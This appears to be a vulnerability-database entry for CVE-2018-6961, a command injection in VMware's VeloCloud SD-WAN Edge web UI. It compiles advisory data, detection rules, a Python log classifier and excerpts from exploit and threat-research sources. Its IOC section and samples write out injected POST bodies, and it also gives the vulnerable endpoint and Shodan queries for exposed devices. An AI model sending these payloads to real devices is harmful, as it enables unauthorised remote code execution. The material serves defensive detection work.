CVE-2018-6961
Published 2018-06-11
Priority P1 (90) · high · 8.1 CVSS 3.1
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-04-15
Exploited in the wild
EPSS: 86.43% (99.7th percentile)
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | nsx_sd-wan_by_velocloud | < 3.1.0 | 3.1.0 |
| vmware | nsx_sd-wan_by_velocloud | — | — |
Detection & IOCs (extracted from sources)
command: destination=8.8.8.8`id`&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
command: destination=8.8.8.8$(id;echo {{rand}})&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"destination="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/destination=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025767; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection 2"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"name="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/name=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025768; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- Exploit targets the unauthenticated POST endpoint /scripts/ajaxPortal.lua with _cmd=run_diagnostic and shell metacharacters ($() or backticks) injected into the 'destination' or 'name' POST body parameters.
- A successful exploitation response contains JSON status OK and output matching uid=/gid= from the injected 'id' command; absence of 'UNKNOWN_COMMAND' in the response body also indicates success.
- Shodan/FOFA queries for exposed VeloCloud web UIs can identify attack surface: title:"VeloCloud" (Shodan) and title="VeloCloud" (FOFA).
- The exploit uses the X-Requested-With: XMLHttpRequest header alongside Content-Type: application/x-www-form-urlencoded; charset=UTF-8, which can be used as an additional filter in HTTP traffic analysis.
- DNS injection variant uses the 'name' POST parameter instead of 'destination', with test=DNS_TEST, also injectable with $() shell syntax.
- The vulnerable local web UI component is disabled by default; exploitation is only possible if it has been explicitly enabled, and VMware advises it should not be enabled on untrusted networks.
- The exploit author notes that the target runs a slimmed-down Linux, so standard reverse shell techniques (e.g., nc -e) may not work; exfiltration via piping stdout to netcat is the demonstrated approach.
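The two ET rules above match the raw request body for `destination=` or `name=` followed by `$(`. The following added example (not from the original page or any of the sources it aggregates) re-implements that logic as a request classifier for log review: it decodes the body before matching, so a percent-encoded `$(` is not missed, covers the backtick form shown in the command IOCs as well, and adds the response-side success check from the bullets. The sample requests and the JSON response shape are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/scripts/ajaxPortal.lua"
# Parameters the diagnostic handler hands to a shell, per the IOCs above:
# 'destination' for PING/TRACEROUTE, 'name' for DNS_TEST.
INJECTABLE_PARAMS = ("destination", "name")
# The ET rules match only "$("; the backtick form appears in the command IOCs.
SHELL_META = re.compile(r"\$\(|`")
# Output of an injected 'id' in the response body (success indicator above).
ID_OUTPUT = re.compile(r"uid=\d+.*?gid=\d+")

# Constructed sample requests (uri, urlencoded body); not real traffic.
SAMPLES = [
    (ENDPOINT, "destination=8.8.8.8&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"),
    (ENDPOINT, "destination=8.8.8.8$(id)&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"),
    (ENDPOINT, "name=example.com`id`&source=ge1&test=DNS_TEST&requestTimeout=900&auth_token=&_cmd=run_diagnostic"),
    ("/index.html", "destination=$(x)"),  # wrong endpoint: not this bug
]

def check_request(uri: str, body: str) -> dict:
    """Classify one HTTP request against the CVE-2018-6961 request shape.
    parse_qs percent-decodes values, so '%24%28' is caught like a raw '$('."""
    if uri.split("?", 1)[0] != ENDPOINT:
        return {"alert": False, "reason": "other endpoint"}
    params = parse_qs(body, keep_blank_values=True)
    if params.get("_cmd", [""])[0] != "run_diagnostic":
        return {"alert": False, "reason": "not a diagnostic call"}
    for name in INJECTABLE_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                return {"alert": True, "param": name, "value": value,
                        "test": params.get("test", [""])[0]}
    return {"alert": False, "reason": "diagnostic call without shell metacharacters"}

def response_indicates_execution(resp_body: str) -> bool:
    """Success indicator from the bullets above: uid=/gid= output present
    and no UNKNOWN_COMMAND. The JSON layout is an assumption."""
    return "UNKNOWN_COMMAND" not in resp_body and ID_OUTPUT.search(resp_body) is not None

def scan_samples() -> list:
    """Indices of SAMPLES that the classifier flags."""
    return [i for i, (uri, body) in enumerate(SAMPLES) if check_request(uri, body)["alert"]]

if __name__ == "__main__":
    for i in scan_samples():
        print(f"sample {i}: {check_request(*SAMPLES[i])}")
```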
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.1 | HIGH | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| vulncheck | — | 8.1 | HIGH | — |
| cisa | — | 8.1 | HIGH | — |
GHSA
GHSA-rvjq-qp5f-gvx6: VMware NSX SD-WAN Edge by VeloCloud prior to version 3 (ghsa_unreviewed · 2022-05-13)
CVE-2018-6961 [HIGH] CWE-78
VulnCheck
VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability (vulncheck · 2018 · CVSS 8.1)
CVE-2018-6961 [HIGH] CWE-78
VMware SD-WAN Edge by VeloCloud contains a command injection vulnerability in the local web UI component. Successful exploitation of this issue could result in remote code execution.
Affected: VMware SD-WAN Edge
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/
- https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors
- https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?d
CISA
VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability (cisa · 2022-03-25 · CVSS 8.1)
CVE-2018-6961 [HIGH] CWE-78
Affected: VMware SD-WAN Edge
VMware SD-WAN Edge by VeloCloud contains a command injection vulnerability in the local web UI component. Successful exploitation of this issue could result in remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-6961
Remediation Due Date: 2022-04-15
Suricata
ET EXPLOIT VMware NSX SD-WAN Command Injection (suricata · 2018-07-02)
CVE-2018-6961
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"destination="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/destination=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025767; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movem
Suricata
ET EXPLOIT VMware NSX SD-WAN Command Injection 2 (suricata · 2018-07-02)
CVE-2018-6961
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection 2"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"name="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/name=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025768; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre
Exploit-DB
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection (exploitdb · 2018-07-02 · CVSS 8.1)
CVE-2018-6961 [HIGH]
---
#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage: https://www.vmware.com
# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
# Version: 3.1.1
# CVE: CVE-2018-6961
import argparse
import requests
import sys
import collections
'''
This script will return execute whatever payload you placed within it.
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdou
Nuclei
VMware NSX SD-WAN Edge - Command Injection (nuclei · CVSS 8.1)
CVE-2018-6961 [HIGH]
Template:
id: CVE-2018-6961
info:
  name: VMware NSX SD-WAN Edge - Command Injection
  author: D3nverNg,thewindghost
  severity: critical
  description: |
    VMware NSX SD-WAN Edge (formerly VeloCloud Edge) before 3.1.2 contains an unauthenticated command injection in the local web UI diagnostic tools (Ping/Traceroute). This template detects it reliably by injecting 'id', 'whoami', and a random marker.
  impact: |
    Successful exploitation allows unauthenticated remote code execution as root.
  remediation: |
    Upgrade
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities (blogs_unit42 · 2019-12-13)
Ruchna Nigam
Published: December 13, 2019
Tags: Malware, Threat Research, Vulnerabilities, Echobot, IoT, IoT Vulnerability, Mirai, Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices (blogs_unit42 · 2019-06-07 · CVSS 9.8)
CVE-2017-5174 [CRITICAL]
Ruchna Nigam
Published: June 6, 2019
Tags: Malware, Threat Research, Vulnerabilities, CVE-2017-5174, CVE-2018-11510, CVE-2018-17173, CVE-2018-6961, CVE-2019-2725, CVE-2019-3929, Exploits, IoT, Linux, Mirai
## Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless presentation systems to set-top-boxes, SD-WANs, and even smart home controllers.
Mirai initially made use of default credentials to gain access to devices. However, since the end of 2017, samples of the family have increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices.
References:
- http://www.securityfocus.com/bid/104185
- http://www.securitytracker.com/id/1041210
- http://www.vmware.com/security/advisories/VMSA-2018-0011.html
- https://www.exploit-db.com/exploits/44959/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-6961
Timeline:
- 2018-06-11: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild